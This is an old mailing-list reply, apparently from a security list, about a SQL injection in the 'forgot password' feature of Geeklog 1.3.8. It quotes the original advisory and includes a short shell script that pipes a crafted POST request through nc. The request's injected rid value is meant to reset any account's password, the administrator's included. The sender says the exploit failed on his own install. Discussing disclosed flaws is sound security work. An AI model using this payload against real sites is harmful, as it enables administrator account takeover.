From: thomas at outcast-media.com (Thomas Rogg)
Subject: Geeklog exploit

am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko@....fi:

> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because an SQL injection problem. In users.php we have
> this kind of code (line about 750):

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas